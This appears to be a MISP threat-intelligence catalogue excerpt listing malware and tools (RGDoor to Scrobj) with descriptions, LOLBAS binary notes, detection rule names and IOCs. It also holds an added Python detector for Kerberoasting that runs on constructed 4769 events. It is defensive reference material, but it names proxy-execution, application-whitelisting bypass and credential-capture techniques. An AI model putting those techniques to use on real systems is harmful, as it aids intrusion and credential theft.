tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '286918d5-0b48-4655-9118-907b53de0ee0', '93c53801-5427-4678-a753-7fc761e9eda1', '1138181b-b2cf-4b6b-82da-10867aa4089d', '00ec2407-cc63-4b62-b967-c3e06bdddd2f', '1cc90752-70a3-4a17-b370-e1473a212f79', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '0ed7d10c-c65b-4174-9edb-446bf301d250', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RGDoor
RGDoor is a malicious Internet Information Services (IIS) backdoor developed in C++. It has been seen deployed on web servers belonging to Middle Eastern government organizations and provides backdoor access to the compromised IIS servers. [Unit 42 RGDoor Jan 2018]
Internal MISP references
UUID d5649d69-52d4-4198-9683-b250348dea32
which can be used as unique global reference for RGDoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0258 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rhysida Ransomware
Rhysida is a ransomware-as-a-service (RaaS) operation that has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.[HC3 Analyst Note Rhysida Ransomware August 2023]
Internal MISP references
UUID f7c1e1cd-cc64-4417-92c3-76afed55d38c
which can be used as unique global reference for Rhysida Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5302 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rifdoor
Rifdoor is a remote access trojan (RAT) that shares numerous code similarities with HotCroissant.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID ca5ae7c8-467a-4434-82fc-db50ce3fc671
which can be used as unique global reference for Rifdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0433 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RIPTIDE
RIPTIDE is a proxy-aware backdoor used by APT12. [Moran 2014]
Internal MISP references
UUID 00fa4cc2-6f99-4b18-b927-689964ef57e1
which can be used as unique global reference for RIPTIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0003 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rising Sun
Rising Sun is a modular backdoor that was used extensively in Operation Sharpshooter between 2017 and 2019. Rising Sun infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed Rising Sun included some source code from Lazarus Group's Trojan Duuzer.[McAfee Sharpshooter December 2018]
Internal MISP references
UUID 19b1f1c8-5ef3-4328-b605-38e0bafc084d
which can be used as unique global reference for Rising Sun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0448 |
source | MITRE |
type | ['malware'] |
ROADTools
ROADTools is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[ROADtools Github]
Internal MISP references
UUID 15bc8e94-64d1-4f1f-bc99-08cfbac417dc
which can be used as unique global reference for ROADTools
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0684 |
source | MITRE |
tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RobbinHood
RobbinHood is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.[CarbonBlack RobbinHood May 2019][BaltimoreSun RobbinHood May 2019]
Internal MISP references
UUID b65956ef-439a-463d-b85e-6606467f508a
which can be used as unique global reference for RobbinHood
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0400 |
source | MITRE |
tags | ['ce9f1048-09c1-49b0-a109-dd604afbf3cd', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
ROCKBOOT
ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group. [FireEye Bootkits]
Internal MISP references
UUID cb7aa34e-312f-4210-be7b-47a1e3f5b7b5
which can be used as unique global reference for ROCKBOOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0112 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RogueRobin
RogueRobin is a payload used by DarkHydrus that has been developed in PowerShell and C#. [Unit 42 DarkHydrus July 2018][Unit42 DarkHydrus Jan 2019]
Internal MISP references
UUID 852cf78d-9cdc-4971-a972-405921027436
which can be used as unique global reference for RogueRobin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0270 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ROKRAT
ROKRAT is a cloud-based remote access tool (RAT) used by APT37 to target victims in South Korea. APT37 has used ROKRAT during several campaigns from 2016 through 2021.[Talos ROKRAT][Talos Group123][Volexity InkySquid RokRAT August 2021]
Internal MISP references
UUID a3479628-af0b-4088-8d2a-fafa384731dd
which can be used as unique global reference for ROKRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0240 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RomCom
RomCom is a custom backdoor believed to be developed and distributed by the Void Rabisu threat actor. It has been used in attacks that Trend Micro researchers assess to be geopolitically motivated.[Trend Micro Void Rabisu May 30 2023]
Internal MISP references
UUID 4af6326b-eba7-4446-83aa-8b98771d390f
which can be used as unique global reference for RomCom
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5295 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RotaJakiro
RotaJakiro is a 64-bit Linux backdoor used by APT32. First seen in 2018, it uses a plugin architecture to extend capabilities. RotaJakiro can determine its permission level and execute according to access type (root or user).[RotaJakiro 2021 netlab360 analysis][netlab360 rotajakiro vs oceanlotus]
Internal MISP references
UUID 169bfcf6-544c-5824-a7cd-2d5070304b57
which can be used as unique global reference for RotaJakiro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S1078 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
route
route can be used to find or change information within the local system IP routing table. [TechNet Route]
Internal MISP references
UUID 3b755518-9085-474e-8bc4-4f9344d9c8af
which can be used as unique global reference for route
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0103 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rover
Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. [Palo Alto Rover]
Internal MISP references
UUID ef38ff3e-fa36-46f2-a720-3abaca167b04
which can be used as unique global reference for Rover
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0090 |
source | MITRE |
type | ['malware'] |
Royal
Royal is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. Royal employs partial encryption and multiple threads to evade detection and speed encryption. Royal has been used in attacks against multiple industries worldwide, including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in Royal and Conti attacks and noted a possible connection between their operators.[Microsoft Royal ransomware November 2022][Cybereason Royal December 2022][Kroll Royal Deep Dive February 2023][Trend Micro Royal Linux ESXi February 2023][CISA Royal AA23-061A March 2023]
Internal MISP references
UUID 221e24cb-910f-5988-9473-578ef350870c
which can be used as unique global reference for Royal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1073 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rpcping
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify rpc connection
Author: Oddvar Moe
Paths: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe
Resources: * https://github.com/vysec/RedTips * https://twitter.com/vysecurity/status/974806438316072960 * https://twitter.com/vysecurity/status/873181705024266241 * https://twitter.com/splinter_code/status/1421144623678988298
Detection: * Sigma: proc_creation_win_rpcping_credential_capture.yml[Rpcping.exe - LOLBAS Project]
Internal MISP references
UUID 3e42b791-fb59-4a8e-a27e-1cc544f353ee
which can be used as unique global reference for Rpcping
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5155 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Rsockstun
Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse SOCKS5 tunneler with SSL, NTLM, and proxy support.[GitHub rsockstun]
Internal MISP references
UUID c3b9281b-5f18-4119-903e-c27f1a4004b4
which can be used as unique global reference for Rsockstun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5076 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RTM
RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). Newer versions of the malware have been reported publicly as Redaman.[ESET RTM Feb 2017][Unit42 Redaman January 2019]
Internal MISP references
UUID 1836485e-a3a6-4fae-a15d-d0990788811a
which can be used as unique global reference for RTM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0148 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rubeus
Rubeus is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.[GitHub Rubeus March 2023][FireEye KEGTAP SINGLEMALT October 2020][DFIR Ryuk's Return October 2020][DFIR Ryuk 2 Hour Speed Run November 2020]
Internal MISP references
UUID 2e54f40c-ab62-535e-bbab-3f3a835ff55a
which can be used as unique global reference for Rubeus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1071 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
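Added example, not from the Rubeus project or the cited reports: detection logic for the Kerberoasting behaviour Rubeus's kerberoast action produces, run over constructed Windows Security 4769 (service ticket request) events. Two signals are combined: a ticket issued with RC4 or DES for a user-owned service account (Kerberoasting tools request RC4 because those hashes crack far faster than AES; Rubeus does so unless told to ask for AES), and one principal requesting many distinct service accounts within a short window, which still fires in AES-only domains where the first signal is silent. The event rows, account names, IPs and thresholds are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos etypes as they appear in the 4769 TicketEncryptionType field.
WEAK_ETYPES = {0x01, 0x03, 0x17, 0x18}   # DES-CBC-CRC, DES-CBC-MD5, RC4-HMAC, RC4-HMAC-EXP


def make_event(t, user, svc, etype_hex, ip):
    """Constructed 4769 row using the Security log's field names."""
    return {"TimeCreated": t, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype_hex, "IpAddress": ip}


SAMPLE_4769 = [  # constructed events, not real telemetry
    make_event("2024-03-01T09:14:50", "jdoe@CORP.EXAMPLE", "FS01$", "0x12", "10.0.0.25"),        # normal file-share ticket
    make_event("2024-03-01T09:14:55", "jdoe@CORP.EXAMPLE", "krbtgt", "0x12", "10.0.0.25"),       # TGT renewal noise
    make_event("2024-03-01T09:15:02", "jdoe@CORP.EXAMPLE", "svc_sql", "0x17", "10.0.0.25"),      # six RC4 tickets for six
    make_event("2024-03-01T09:15:05", "jdoe@CORP.EXAMPLE", "svc_web", "0x17", "10.0.0.25"),      # service accounts inside
    make_event("2024-03-01T09:15:08", "jdoe@CORP.EXAMPLE", "svc_backup", "0x17", "10.0.0.25"),   # 40 seconds: SPN sweep
    make_event("2024-03-01T09:15:11", "jdoe@CORP.EXAMPLE", "svc_sccm", "0x17", "10.0.0.25"),
    make_event("2024-03-01T09:15:14", "jdoe@CORP.EXAMPLE", "svc_reports", "0x17", "10.0.0.25"),
    make_event("2024-03-01T09:15:40", "jdoe@CORP.EXAMPLE", "svc_ftp", "0x17", "10.0.0.25"),
    make_event("2024-03-01T09:20:00", "asmith@CORP.EXAMPLE", "svc_sql", "0x12", "10.0.0.31"),    # AES, single service
    make_event("2024-03-01T10:02:13", "bwilson@CORP.EXAMPLE", "svc_legacy", "0x17", "10.0.0.44"),  # one legacy RC4 app
]


def etype(event):
    return int(event["TicketEncryptionType"], 16)


def when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def is_noise(event):
    """Machine accounts and krbtgt itself are not Kerberoast targets."""
    svc = event["ServiceName"].lower()
    return svc.endswith("$") or svc.startswith("krbtgt")


def weak_etype_requests(events):
    """Signal 1: a TGS issued with RC4/DES for a user-owned service account."""
    return [e for e in events if not is_noise(e) and etype(e) in WEAK_ETYPES]


def bulk_spn_requests(events, window=timedelta(minutes=5), threshold=5):
    """Signal 2: one principal/IP asking for >= threshold distinct service
    accounts inside `window`, the shape of an SPN sweep regardless of etype."""
    by_src = defaultdict(list)
    for e in events:
        if not is_noise(e):
            by_src[(e["TargetUserName"], e["IpAddress"])].append(e)
    findings = []
    for (user, ip), evs in by_src.items():
        evs.sort(key=when)
        for i, first in enumerate(evs):          # sliding window anchored on each request
            services = {e["ServiceName"].lower() for e in evs[i:]
                        if when(e) - when(first) <= window}
            if len(services) >= threshold:
                findings.append({"user": user, "ip": ip, "start": first["TimeCreated"],
                                 "services": sorted(services)})
                break
    return findings


def kerberoast_suspects(events):
    """Principals that trip both signals: high-confidence Kerberoasting."""
    weak_users = {e["TargetUserName"] for e in weak_etype_requests(events)}
    return sorted(f["user"] for f in bulk_spn_requests(events) if f["user"] in weak_users)


if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_4769))       # ['jdoe@CORP.EXAMPLE']
```

The single RC4 ticket for bwilson is reported by the first signal alone and is the kind of hit that needs a baseline of which legacy services still negotiate RC4; the sweep signal is what separates a Kerberoast from that noise. Tune the window and threshold to the environment, and remember that slow, spaced-out requests (Rubeus supports delays between requests) will walk under a fixed window, so keep the etype signal even where it is noisy.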
Ruler
Ruler is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of Ruler have also released a defensive tool, NotRuler, to detect its usage.[SensePost Ruler GitHub][SensePost NotRuler]
Internal MISP references
UUID 69563cbd-7dc1-4396-b576-d5886df11046
which can be used as unique global reference for Ruler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows'] |
software_attack_id | S0358 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rundll32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute dll files
Author: Oddvar Moe
Paths: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe
Resources: * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ * https://github.com/sailay1996/expl-bin/blob/master/obfus.md * https://github.com/sailay1996/misc-bin/blob/master/rundll32.md * https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 * https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Detection: * Sigma: net_connection_win_rundll32_net_connections.yml * Sigma: proc_creation_win_rundll32_susp_activity.yml * Elastic: defense_evasion_unusual_network_connection_via_rundll32.toml * IOC: Outbound Internet/network connections made from rundll32 * IOC: Suspicious use of cmdline flags such as -sta[Rundll32.exe - LOLBAS Project]
Internal MISP references
UUID cd5a27c8-9611-41d9-b839-b0ba7daf58b5
which can be used as unique global reference for Rundll32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5156 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'd28b269e-588d-49ed-b5c9-8e82077924c0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Runexehelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths: * c:\windows\system32\runexehelper.exe
Resources: * https://twitter.com/0gtweet/status/1206692239839289344
Detection: * Sigma: proc_creation_win_lolbin_runexehelper.yml * IOC: c:\windows\system32\runexehelper.exe is run * IOC: Existence of runexewithargs_output.txt file[Runexehelper.exe - LOLBAS Project]
Internal MISP references
UUID db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd
which can be used as unique global reference for Runexehelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5157 |
source | Tidal Cyber |
tags | ['270a347d-d2e1-4d46-9b32-37e8d7264301', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RunningRAT
RunningRAT is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with Gold Dragon and Brave Prince. [McAfee Gold Dragon]
Internal MISP references
UUID e8afda1f-fa83-4fc3-b6fb-7d5daca7173f
which can be used as unique global reference for RunningRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0253 |
source | MITRE |
type | ['malware'] |
Runonce
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes a Run Once Task that has been configured in the registry
Author: Oddvar Moe
Paths: * C:\Windows\System32\runonce.exe * C:\Windows\SysWOW64\runonce.exe
Resources: * https://twitter.com/pabraeken/status/990717080805789697 * https://cmatskas.com/configure-a-runonce-task-on-windows/
Detection: * Sigma: registry_event_runonce_persistence.yml * Sigma: proc_creation_win_runonce_execution.yml * Elastic: persistence_run_key_and_startup_broad.toml * IOC: Registry key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY[Runonce.exe - LOLBAS Project]
Internal MISP references
UUID ccad36ac-b526-44ec-840a-6f498c51781c
which can be used as unique global reference for Runonce
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5158 |
source | Tidal Cyber |
tags | ['065db33d-c152-4ba9-8bf9-13616f78ae05', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Runscripthelper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute target PowerShell script
Author: Oddvar Moe
Paths: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Resources: * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Detection: * Sigma: proc_creation_win_lolbin_runscripthelper.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Event 4014 - Powershell logging * IOC: Event 400[Runscripthelper.exe - LOLBAS Project]
Internal MISP references
UUID 035bae51-c1cc-46f0-8532-a5d01c4d4a52
which can be used as unique global reference for Runscripthelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5159 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Ryuk
Ryuk is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. Ryuk shares code similarities with Hermes ransomware.[CrowdStrike Ryuk January 2019][FireEye Ryuk and Trickbot January 2019][FireEye FIN6 Apr 2019]
Internal MISP references
UUID 8ae86854-4cdc-49eb-895a-d1fa742f7974
which can be used as unique global reference for Ryuk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0446 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '12a2e20a-7c27-46bb-954d-b372833a9925', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Saint Bot
Saint Bot is a .NET downloader that has been used by Ember Bear since at least March 2021.[Malwarebytes Saint Bot April 2021][Palo Alto Unit 42 OutSteel SaintBot February 2022]
Internal MISP references
UUID d66e5d18-e9f5-4091-bdf4-acdac129e2e0
which can be used as unique global reference for Saint Bot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1018 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sakula
Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [Dell Sakula]
Internal MISP references
UUID a316c704-144a-4d14-8e4e-685bb6ae391c
which can be used as unique global reference for Sakula
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0074 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SamSam
SamSam is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[US-CERT SamSam 2018][Talos SamSam Jan 2018][Sophos SamSam Apr 2018][Symantec SamSam Oct 2018]
Internal MISP references
UUID 88831e9f-453e-466f-9510-9acaa1f20368
which can be used as unique global reference for SamSam
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0370 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Samurai
Samurai is a passive backdoor that has been used by ToddyCat since at least 2020. Samurai allows arbitrary C# code execution and is used with multiple modules for remote administration and lateral movement.[Kaspersky ToddyCat June 2022]
Internal MISP references
UUID bd75c822-7be6-5e6f-bd2e-0512be6d38d9
which can be used as unique global reference for Samurai
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1099 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sardonic
Sardonic is a backdoor written in C and C++ that FIN8 has used since at least August 2021, including to target a financial institution in the United States. Sardonic has a plugin system that can load specially made DLLs and execute their functions.[Bitdefender Sardonic Aug 2021][Symantec FIN8 Jul 2023]
Internal MISP references
UUID 9ab0d523-3496-5e64-9ca1-bb756f5e64e0
which can be used as unique global reference for Sardonic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1085 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manage services
Author: Oddvar Moe
Paths: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Detection: * Sigma: proc_creation_win_susp_service_creation.yml * Sigma: proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml * Sigma: proc_creation_win_sc_service_path_modification.yml * Splunk: sc_exe_manipulating_windows_services.yml * Elastic: lateral_movement_cmd_service.toml * IOC: Unexpected service creation * IOC: Unexpected service modification[Sc.exe - LOLBAS Project]
Internal MISP references
UUID 41be663f-ecc9-4ab6-afeb-c52737f84858
which can be used as unique global reference for Sc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5160 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
schtasks
schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [TechNet Schtasks]
Internal MISP references
UUID 2aacbf3a-a359-41d2-9a71-76447f0545b5
which can be used as unique global reference for schtasks
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0111 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'f0c54030-956a-4bac-9f98-deb2349183ac', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Scriptrunner
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute binary through proxy binary to evade defensive counter measures
Author: Oddvar Moe
Paths:
* C:\Windows\System32\scriptrunner.exe
* C:\Windows\SysWOW64\scriptrunner.exe
Resources:
* https://twitter.com/KyleHanslovan/status/914800377580503040
* https://twitter.com/NickTyrer/status/914234924655312896
* https://github.com/MoooKitty/Code-Execution
Detection:
* Sigma: proc_creation_win_servu_susp_child_process.yml
* IOC: Scriptrunner.exe should not be in use unless App-V is deployed [Scriptrunner.exe - LOLBAS Project]
Internal MISP references
UUID ba4d8522-9656-462e-b25e-32a9bba85a60
which can be used as unique global reference for Scriptrunner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5161 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Scrobj
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Script Component Runtime
Author: Eral4m
Paths:
* c:\windows\system32\scrobj.dll
* c:\windows\syswow64\scrobj.dll
Resources:
* https://twitter.com/eral4m/status/1479106975967240209
Detection:
* IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line [Scrobj.dll - LOLBAS Project]
Internal MISP references
UUID 101f7867-9c5c-482e-b26e-9fdb8ff9b2c7
